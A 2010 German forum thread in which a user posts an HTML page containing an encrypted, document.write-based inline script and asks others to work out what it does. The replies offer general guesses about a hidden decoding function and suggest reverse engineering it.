[Javascript] Verschlüsseltes Script

03/03/2010 02:00 Atheuz#1
Vor kurzem wurde mir eine Seite zugespielt die nach meines erachtens einen Client basierten request abschickt. Das Problem ist nur, dass das Script selber verschlüsselt ist und ich keine Abfrage mit WPE oder Wireshark sehen kann.
Auf der Seite gab es dann auch ein Folge Script was auch verschlüsselt war, was ich aber ganz normal decrypten konnte wo v0 aufgerufen wird und ein null string returned wird.

Jetzt will ich aber genau wissen was das Script auf der Seite macht :S

Quote:
<html><head></head><body><script type="text/javascript" src="/1"></script><script type="text/javascript">document.write(_("=\xd4\x11\x11\xbd\xf 3\xd1\x5c\xeb\x8d\xb5\xaaT\xe7\x19\x13\x179l\xb2\x d1\x91J(B*\x0d%\x16?\x81`\xc0\x05\x03\xa6e\xe7\x5c \x94\xfe\xcb\xce\x94e\x0f!\xf8\xd7!\xcdBt\xfan\xd0 \x03\x95\xd7O\x00\x8b\xa3G\x01m\xa9\x19\xa5\x9b\x1 3\x9c\xe5(\xa14\xad'H\xb6\xb6N\x11\x9f\x90A\xbfQ-\x03\xce\x0c\x83\xad\xb2\xa1\xaa9~\xbe\xd4\x83\x85 M75\x92\xa2\xe2\xb0\xc2\x8ddx\x88\x0d\xca\xe2K\xf9 n\x1fMai\x8d\x91\xb3Q\xda%\xa5\x89\xf9O\xed\xfb\xf d\x8c\xfbf\xbe\xbf\xa27\x16,N\xdc\x88\x92\x12\xbf\ x96\x0c\xc5$\xa0gc6\xad\xc1F\x02\xf9\xe1+\x1fv\x09 (@\xa8B\x16\x5c\x82J\xd2\x80\x1f\x82\xa2\xd9\x12\x 16#OAD8x\xd1\x87\xe1o\x03|\x88K$;I\xc7{x\xffN\x89\ x88\x1fR\x89N\xd5I,`\xcc\x11\x03\xbb1\xde\x0f=%t\x e4>a\xf0\x90\xc2S\xc2\x92\x8e\x22\xbe\xc2(\xd9\xd6 b\xff\x9c}e&\x8c\xbd\x80`\x00E\xfev\x0cO\xe47:\xc8 \x9e\xeb\xcc\xdb{\xf4\x10P0c,;B>\x92\x18\x1bg.\x18 \xca\xba\x88+\x0eK\xca\xd9\xad\xe8\xa9aq\xd8\x91m\ x9e\x1a&\x80\x96\x85u\x95\xa7\x8d\xb4}\xb3\x0eC\xc 7L\x04\xeb\xea\x1f\xe7(\x01\xd5\xcc6\xd6Lg\xe9;!\x fc\xce\x07f\x81\xda\x88\xe4'\xdf+q\xbe \x07\xbdc\xa7+\xc0\x9ag\x81\xef\x9c\xf7\xecY`\x9d\ x88\xb1v\xa7-4'i(\xd5#\xad\x81\xc1\xf4]\x15\x8c\xa0Qd\xf5\xff\xf0N\xe4\xa8W\xd9\xa9\x19\x ba\x85IuHn\x87\x8fjR\xc1ACz\x0aim\xe6\xe0_:\xcf\x9 b\x96\x08\x0d\x09-\x0e\xc4\xba<\xce\x81*\xb4C\x84w\x81\x04\xcdp\xc7M \xf3\xecf\xe2I\xc3\xb2?\x86L\xbb\x19:\xf6h\x8cu!?\ xde\x17\xbd(\x7f\xben3I\xf1\xf1\xe6\xc7\xdb\xfdeEV \x82w\xa8E,m\x8b\x8d\x1dN\xf7\x8f/\x5c\xc8\xc6GwUX$\xca\xb8f\xd1\xea\xf2\xe9\xd1!\xa c\xd5Cu<U\xe9\x86\xffP\x12\xaeX&\xc1\xae#\xec2\x1a Z\x91\x09\x0f\xe4\xa4\x15q8\x15N\xe9\x83\xfa\x15\x 04\x09\xe5~\xf6\x0a\xfe]\xa0\xfd\x16\x1e\xee\x17\x86\xe6\xcd\x02]D\xa5\x1f\xe3\x9b\xfa\xdc\x03\xcd\xf9\x80\xefz\xcd \x9dC-t?Q\x14\xec\x0c(\x0fhPp\x03\xd7\xe0\x8a\xdb\xa0GB\ xfa\xe1I.\xe3\x91\x14x\x04E\xfe\x0b]\xf8\x86\x98\xa3\xc7\x95\xb3\xa1J\xc8\x98 \xb5{2\x1f\xdd\xa1sZ%\xe8Q\x04\xa3y;\x05\xa8\x08\x bdT&5\x0f\xc0X\x18_b\xe3\xc2\xb7\xcf\x1e\xea\x1c5\ x22\xf8\xc7f\xa0X\xb2\xc2\xfe}K[$T\xb6|\x81\xe1'\x15r\xda\xa7\x5c\xc9\xeb\x8d\xf1U \x98\xa8)\x88ad\x19\x86\xfe\xcfkw\xe2\x84\x85\x8b\ xf7\xd0Jj\xe0<\x22\xd4J\xf3i;\xbcg\xed\x07\x08twyz \xacx\xcb\xf8_\x0cs\x0esZ\x9f\xd1\x8a\x8d\xf5\x0b\ xc3K\xd5\xc3\x89Q\x9af\xe9\x10\xae\x81\xb4\xa4\xae \xdd\xf7\xc5\x17\x9e\x84n\xf4\x92\xf47\x9dj\xcf\xd 0\xd1\xec{yM\xb5\xabYg\x0e{\x9a\xaf\xf5<\x9c\xba\x f1Z\xfc\xd4\x5c\x0c\xb4\xa8@\x87)\x81\xa7\xa93O\x9 7P\x09\xc3\xf09\x95\xb6x\xc8\x11]\xd8\x93`RE\xe8\xdf\x87\x0b\xa8\xb4\xb0\xc1\x22\xb 9\x87\x0c\xccj.\xb7\x97\x10\x1dF\xc3\x05\x15\xea\x d1\xdf\xf0[_X\xf4L\x16\xa4\x1a\x14\x99\x92\x19\xba\xc4\x95BJ/\xa9\x9c\xd9\xe7\x82\xaf\xdf\xd9:\x85.`\xc9\x17#p\ xa3\xffyo\xea\x84=:|\xa9\xdc\x05\xfeV\xe7m\xf9\x8b k\xc2\x9eE\x0f\x15\xc9\xb6\x1e\x0db\xcfl\x0aR\xf6\ x85\xd5\xfdH/\x18\xe3\xef\xcd\xe6/\xef\x10\x1e\x04\x95\x10\x86`\xa8\x9a\x8b:\x8d8F\x c2J\x11\xda\xe4o\xffl\x01DG\x9d5K\x08+rk\xdb\xc0J\ xb6+\x99\xb3j$\xa5\xc5*\xd9\xed\x16O\x00u\xd5\xf1\ xffx\xd4\xbfF\xefp#FF\xbc\xee\xea\xa6\x07\xcd;><\x e0\xeb\x1a\x93\x0d\xa6\x8f\xad\x22\xf2n\xde\x93M!: \x82q\xb9m\x19\xcf\xcc\xdc\x86S\xabSs\x9f\xe0v\xa2-Yj\xc9\x181\x22,\xdd\xadP\xc1\x1ey\x8e\x9a\xf7\xf6 \x1d\xc2\x1fC\xea~\xf2\x18\xec\xccR\xe7\x1c#\xde\x 88\xef\xb1h\xb1\xf4\xb0g\x89e2\x9a\xffx\x95(\xe98\ xb1\xf0\xc2\xae\xfa\x8c\xb5\x19\x871\xf3u\xf6\xcb\ xb45\xa1\xb0\xa7\x81\x19\x0a\x99^U\x86Fmy\xa0\xfa\ xb4\xcf\x91\xb4]\x0d}\x8e\x0b\x9b+\x9b\xfe\xa2\x10'\x19\xe0\xac9\x c7\xcf\x80O.R\x88\xa0\xa9!\xdcn7q>\xd2\x1e6k3\x0fO \xf7qn>r\x07`7\xa5\x14\xa0s\x12?\xa21\xb3\xebF(<\x ae;/7\x8a\xb9\x08\xcd\xa8\xc1\x08\x8d]\x176(ee\xb2\xca1\xfb\x9a:\xf1\xd6@\xe5m\xfd\xb3\x bc$z{m\x04\xd0\xd6\xdd\xca\xa0\x0c\x91\xb64@W\xc2\ xd0\xe1i\xd5\x91\xd7\xb3{\x8f\xa4\xe1\xee\x1ap7p<\ xea\xb1Gy{\xb83\x0b\xc4~\x12\x04\xcd\xc8\xb0\x17\x c9\x1fgY\x12\xcdH\x03n\x04|\xcbV\x9d&\xfe\x02\x1c\ xa2\x91@\x12\x08\xfe\x9b\x0f\xe5{\x18\x1e\x81tEi+\ xf7\xa2\xc2\x11Z\x1f\xf4\xa6^\xab\xa5\xdbx\xdau;\x db\xed;\xf6T.\x8a\xc2g\xecn\x12\x17\xf0\xa8\x8d\xe d\x1a\x05|e\xfb-tk\x1c\x10o\xeb\xdc\x1d\x1fs\x98X\xf4A\xe4n\xf6\x9 d\x0e\x92\xe5\xcf\xde\xb2\x00\x9e\xd1\xf1\x0c\xe4p \x14\xc20 ,I\x05\x8d\xaf\xc9\xc1\xdf\xcd\x0c\xba\xd9o\x8d\x8 1\xe4\x19\xcea\xee\x09U\x1d\xa0\xfa$.\xdb\xf2V\x0e \xe9\x9b\xb5@2c\xbc\x80]\xef~eh\xb2R\x17\xfc\xe6#F\xde\xa1\x15^\x01\xba\xa bH\xa5\x14\xad\xbdS\xc7\xe6\xfa\xb0&\xdd\x12)\xe6r \xc5-!*\xd8\xd2h,\x05-\xabb\xe84\x8c\xdc\xfd\x81\xfc\x07\xa6\xe4\x96\xb6 \xcf\xe3p\x12|\x95g\x08\xfd\x84\x0d\x89\xae\x5c\x9 7\xf0\x12E\x05\xebf\xbaiu\x92r\x12\x9f\x07Cq\xe8/\x0es\x81\x19\xaf\x9dW\x84:\x1e\xf56}\xa4\x9a\xf9\ xbf\xa1\x04\xff$\xe3w\xd1@\x1c$\x84>x\xdb\x8d\xbc\ xcf\x1d\xae\xd0\xb9%\x0d\xe6\x92\x12\xf4\xd1\x9d\x 1d(\x1c\xbfy\x07\x0d\x90\x92\x95\x84\xad\x90[\x1b\xba\x12\xa1\xd0\xd0l\xe3\x87)\x01=\x8a\xa7\x0 c\x17\xf1&\x12A\xb9[\x13A\x87\xf5\xabY\xad\xde\x19f\x85\xb7#\xfcm\x9bK \x17=]K\x8f\xeb\xa7A\xb3Y\xc4x\xa9\xfd`dS\xfeN\xe2|\x9b\ xda\x82\x92\x12\xeb\x95\xb5\xd6\x0d\x02\x0a\x17Pi\ xbbz\x85\xd4m]\xaf+\xde+t\xc1z'\xc2\xb7\xa4\xdd\xf1\x13\x9aV\x0f \x7f\x945\xe8W\x00\xc3\xdf\xfd\x0b\xcb\x11\xd6W\xd a\x03\xc4>\xaf\x11\xc2\xf4r\x16\xbdIw\xbe1s8tM\xcd \x9a\x8aZ+7\xf8\x9c\xfaed\x8fQ\x15{i\xc7\xf0\xf1\x da\xb4\x06\xf0G\xa3F\xc0\x22\xc3\x0eU\xb6\x89\x85\ x9a\x99\xd7\xbaT\xd9B`D$\x1c\xd8`\xc9R\x8e\x5c\x9c \x89\xeec1\xce\xe3VP\x04p\xf1)\x8f\x8a\x8e\x17\xa2 \xb4\xea\x9d1&\xe7\xa8\x160\xe1\xd8\xd0\x1f\xce\x8 f\x8evM\xc2\x85t|$\xf0\xd1<\xce\x81\xfa\xa0\xb3\x0 bh^=\x05ot\x9a\xe6\xabL\xe0\xfa6\x01\xca\x88\xc2p\ xc3\x10\xa8\x0d<\xcf\xc4\x04\xadu\xb2\xec\x04nA+Q\ xfd\xaa\xb3\x8d\x02O=E\xc4\xbcD\xb8\xad\xe5+@\xa0t \xf80\x1d\xd0c\x14H\xf9(3\xca\xa8\x0bK\x0a\x00G\xd 3\xa4\xf84M\xd5\x06\xd4\x12$^#\xc9\x82 \xf7\x92\x94\x0d\x1f(\xbd\x98\xa3\xeb\xf9;G\xc0\xf dvDJ\xe8?\x8ea\xa7\xac\xeeF\xb5\xc1\xcfbR\x11\xffJ \x83\xe4o\xfa0\x9c\x8a$\xea\x92Z5\xef]\x898\x84JH\xec\xf4 \x87\x8f\x03^j\xe9\x90\x8d\xb5\xaf&\x0fx\x0bI\x93, $W@\xfd\xc3\xa6\xd9\xd6e\xc7\xc8=\x8b\x05\xf7m\xbb \x22\x14!\xf5\x99\xfe\x9bT\xee5\x0e\x9f\x82\x86\x1 f\x97\xfd$q\xd4\x84\xf9J\xea\xd6\xab\xa2\xa5V|u\x8 c\xeec\xc7\x9dF\xd8\x15\x908\xd8\xf1$CR\xa2\xf6,\x a7e\xea&6Ma\x14\x01jV\x9a\xbc\x04j\xf5!\x1e\xc0\x1 8\xed4<wZv\xf7\xd1\xbb\x17r\x88\x14QN\xc0\x15\x98h \xd8\x0a<\xf9\xfa\x83\x1c\xe0\x1a\xa2\xa0\x1a\x03\ xc4\xed\xd2E\xa3\xa4\x81|?4\xe7w\x9d\x94\xe1Bz\x8e \x16H\xec\x9b*^\xb47m\xcb0\xd5+7\x80\xc7\x92\xfd\x eeDu\xc4 d\xdb\xe2\x1d\xca\x83\x22J5\xbb\x1b\xc9\xaaE\x17\x c5?\x05\x01\xd0/]\x93\xd2n\xfd\x97\xfa\x9c\xd6\x13\x95\xe3\xf51Xdt\ x94\xac\xe6f|\xb7\xe1\x16\xce;\xd2\x8d\xef\xaf;I\x 0b\x0a\x07\xa4\xa7\xc7vl.OV\x03\x83\xab\xd2@7\x94g p\x99{\xf17\xbe\xb9r\xa1\x9f\xbego\xdb\xf6\xe7\x22 \xc1\x04\xae\xd0\xa8I\xfbK\xe9\x9a\xd0\xcaW\x86`h\ xe3\xa6\x80\xa7'mO\xd7\xb8\x98V/\x02`\xd1\x89m\x98\xbcq\x99\xb9\xacx\xe1\xbc\xec4\ x18a0\xb6\xc8\x96\x09,T\xb3~\xaf\xbd:k\xedj\xd8lE\ xe4\xa1\x03/.^W \xe9\x97>\xc4Zk\x98\x81E\xb3E67\xb0\xa1z\xe9\x81%\ xed\xb8\xb5\xf3\x0bM\xa1&\x99\xb6\x84\xb5\xd7\xbaB \x8e\xa1\xdbl\xdaw6\x9d|[\x9fs\xce\x15T\x07\xe3\x9ah\x8d\xa5Ko*\x9e\xb3\xcc \x90\xbc\x84\xa2(\x11\xdc\xfcr)\x8b\x89\xeb*\x22\x a7E\xe3\xc8\xbc\xf1\xa0]3\xd4u,\xee\x8e\xa4Z\xef\xc6\x12}\xdf\x01\xef\xf5b \x0c\xd2\x08\xf7.\x09\xa0\x13L\x9fZh\xee9\xd5a\x1e 3\xb9\xdf\xaaR'}\x921Z\xaf=\xed\x80\x85>qRvPhB\x1b \x99d\xd9\x89\xf1\x9c\x98n\xf0\xf8> \xc6d@t[\xd3\x8e\x05\x02\xb1\xcd\x9e\xe5\x86\xaf\xac\xa7\x 83\xbf\xe6\xad\xd6\xd3lE\x83:\x13c\x8a\xdfp\xa9#U\ xae\xc1A\xac\xb1YN\xbb\xc8\x9am\x8a\x13\xc9\x99\x8 79\x19lM\xadO\xe3\xa1\xa1\xe1\x1f\xaf0a\xbeX\x1aZ\ xf5;\xcb\x91\xa3\x91\xbc\x84%Ie*\x9e\xc0\xba1`%\xc bSa%S\x22\xdf-\x06|\x83\x93q\xba\xaaR\x1b\xcdp\x15\xc5Q\x88\x8e\ xea]`r|\xd1\xcf\xf3%\xbcx]i\x96\x90\xedh\x00\x0em\xaa\xc7\xaf]\xd7 \x15W\x13\xf4\x86\xee\x1e\xe9\xf9\xed^Al\xdd\xb7\x f3\xe2\xbc\xd4v\xd6?\x90\xc9\xdf(i\xdaA\x13$\x0a7\ xe4\xf3\xb7\xd7\xfc\xbb\xe6/V\x1fH\x89\x93\x5c\x97\xe8\xd5e\x91\xc5\x02\xaepS1 0\x84\xcf\x1c\xd6\xceQ\xc5\xfeF:\x99\x01\xbde\xb9\ xe0\xfeK\x05H\x0d\x08\xf4\xf0\xaa:\xb6\x91\x0bC\xf cb\x1d\xb7\xfa\xac\xdc\xcb\xd7o\x19\xfd-\x9f\xf26\x92\x07\xff\x13Bps\xf0&\xd9(\xc00\xfew1X \x12\x7fm\x0f\xfd\x8f\xeb\xdf\xaa`\xc4\x03\x0c\xcc \xd7eO\xe7:\x89z\x22\xcd6$\x95>\xc7mt\x0f\xd03\x22 \x89C\xcfQ\xffYf\xf8\xf8M\xa9.9\x18\x1a\xce\xe4\x0 3\xe9\xb8\x86\x0aIq\x1f\xc2h\x7f\x0f\x84NHg\xd1\xe a\xd5\x88\x87\x0dh\x7f\xe7\x11\xf5\xd0\x8an\x05\xc 9\xce\xdf\x8fl\x155\xb1^'`\x04\x0e%\x0ep\x00x\x96\ x1f\xf1\xa3\xdaV\xc2\x92\xb4e\xd1\xe8\xa3\x99\x14\ x03\xd6u)\xdc\x829+\x22\xe2\x9a\x00\x06\x97-\xe67\x9c\xf6\xfcZt\x8f\xe1\xae\x05\x08\xdb$\x81\x e4\xf4g~\x02\xf6\x04\xb5\xa4\x94\xa7\x5c\xc3$\xf1@ \x18\xae\xc0\xd9\xf2?\xab\x19Z\xeb\xbf\xbd\xc0;\xc 3\xafv\xd8\x88}7\x15\xba\xfd\x8a=Np\xddv\xb3\xcbE\ xe0\xf6\xc2\x84\xd2\xc9\xa0c`Yj\xb1\x13\xa1\x8c\xb 6/\xc7M\xd8\xceZni\xab\x15\x83N\xe2\xdc\xdf\x1e\xb5\ xfb\xbc\x8b\xe0s\xfa?\xbc\x05&\x1fE\x07\xd8\xca\xf 7\x8b\xa9W\x17\x09\xac\x93\x16\xd9\x13X\x0b\xc0\xb 6ZTMk\x95\xb9\xf7\xdf\x81\xb8\xd9\xb82\x8c\xbc\xd7 c\x09t\xd8I\xbc\xd7\xcc\xe6\x994~hn\xf9\x91h\x84\x 81G\xa7\xf8\xb9E\x11\xa5@U\xfcM\xcf\xbboW\x19V3\xd 9\x0a\xad\xa8\xf2K\xc1\xe6\xc4\xf8bn\xea\xe8\x88\x 9e\x1d\xfe\xd1F\xbe\xf2$\xfc*\xcc\xd0=\x97\x0c\xdc/3\xcb\x0b\xa1f\xce\xb8pUQ\xf9y\x99`J\x14\x84/\xff\xb7B_\xec\xc5\x9c\xba\xb42\xc05\xbb\xa5\x00*J \xe0'\xadQ\x9e\x9e\x8cn\xd3q/H.,\xb6\x88\xd6%\xadR\xa9\xdcu\xe5\x90x\xea.Ng\xa8 \x0f\xf2\x826E\x02V\xbe\x89\xa2/\x1c\xca\x9c\xef2\xb474\xe5h\x85\x06\x97\xc2\xc49\ xc3t\x9a0\xd6\xcf\xdc\x14\xcc\x8b\x84\xcfT\x7f\xf7 58\x01O\xbc9\xffb\x8bV\x10\xa1\xd0DG5\xbd3\x80\xb0 \xfe\x08\xc6{Z\xb5\xc6zE\x06wS)\x0e:\x92M_#m\xf0#\ x06\xc4\x89.O\x83M\xcd\x22\x97\xe5\x1b\x10h\xb4\x5 cs}\xf5A9G\x81\xa5\x11\xcc\x97\x8bo\xc3\x97_\xac\x fd^D\xc9Dd\x18s\x9e\xc6T`\xca\x1e'L\xfe\xd4Bh'x\xd 9\x06A?\x13\x1f\x1c\xa9\x8a\xa8\xd8\x9e\xd4n\x0c\x bb,9\xeb[}\x08Pt\xb8\x97\x91\xb0\xd5\x18\xd0;CuZ\xc7\x8b\xa 4!\xf7\xe7t`\xdf\x86\xfe\xbb\x93r\xd6\x8b\xc9\xad, \xe8\xe8s\xd6\x82^\xbd%\xc1\x9d\xf89\x8d\x93K[RA\xe6wp`\xd5\xc6\xb8\x9bn\xe7\xf9v\x80/\xa5pw\xb3\xdfCe\x1d\xd1`\xd8\xd3\xaa\xb4*\xb7\x13 \xdf\xe2\xf9\xce\x82\xf0jPKg\xa0\xb8\x1b\x92i\xc4\ xb2\x1a^i\x83w\x17\x9b\xfe\x5cjw\x1b\xa4Q\x81\xe09 D\xeb\xfe\xb5[\xb3\x01P\x19\x87\x0c \xd1K\xda\xd6\xbb\x18qH\xb6q\xfb\xc6KTc\xef\x91g\x 14\xf7\xe6%@\xc4Y\xcb`\xd6_\xa1\xc8(\xcd\xde+\xa9\ x04\xa1\x95\x8bC\x99\x91\x9b\xa5\xf9\x0c\xafJ~g\xa 44\x95EF\xf17\xc9u\xfd\x07\xb4\x86[\x97\x92P\xf0\xbbd=\xce\x81\xd6\x0e\xb3\xc5\xc0\x1 b\x0f#/\xd3\xff\x1c\x81\xe1D.\xe4\xc2|\x98\xff"));</script></body></html>
03/06/2010 22:18 Atheuz#2
bump ;_;
03/07/2010 00:05 Shadow992#3
Quote:
Originally Posted by Atheuz View Post
Vor kurzem wurde mir eine Seite zugespielt die nach meines erachtens einen Client basierten request abschickt. Das Problem ist nur, dass das Script selber verschlüsselt ist und ich keine Abfrage mit WPE oder Wireshark sehen kann.
Auf der Seite gab es dann auch ein Folge Script was auch verschlüsselt war, was ich aber ganz normal decrypten konnte wo v0 aufgerufen wird und ein null string returned wird.

Jetzt will ich aber genau wissen was das Script auf der Seite macht :S
Ich vermute , dass es irgendwo im Quelltext eine Funktion gibt , die in etwa so aussieht :
Code:
_(var irgendwas)
{
//wahsrscheinlich wird hier der Entschlüsselungsalgorythmus gestartet
return entschlüsselt
}
Was man auch erkennen kann ist , dass wohl jedesmal wenn "/x" kommt , ein neues Zeichen beginnt (ist eine Vermutung) , wahrscheinlich wird der String gesplittet und dann Buchstabe für Buchstabe entschlüsselt .

Man kann auch noch das document.write(...) sehen ,also muss der entschlüsselte Text anschließend auf der Internetseite ausgegeben werden .

Recht viel mehr lässt sich ohne kompletten Quelltext nicht sagen ...

Btw . Wie heißt denn die Seite ?
03/07/2010 00:25 schlurmann#4
Scheinbar schreibt das Skript ja das HTML Script irgendwohin. Im Endeffekt muss dein Browser ja den richtigen HTML Code haben, um die Seite überhaupt darstellen zu können. Da wirst du wohl um 'ne ausgedehnte Reversing Session nicht drumrumkommen. :p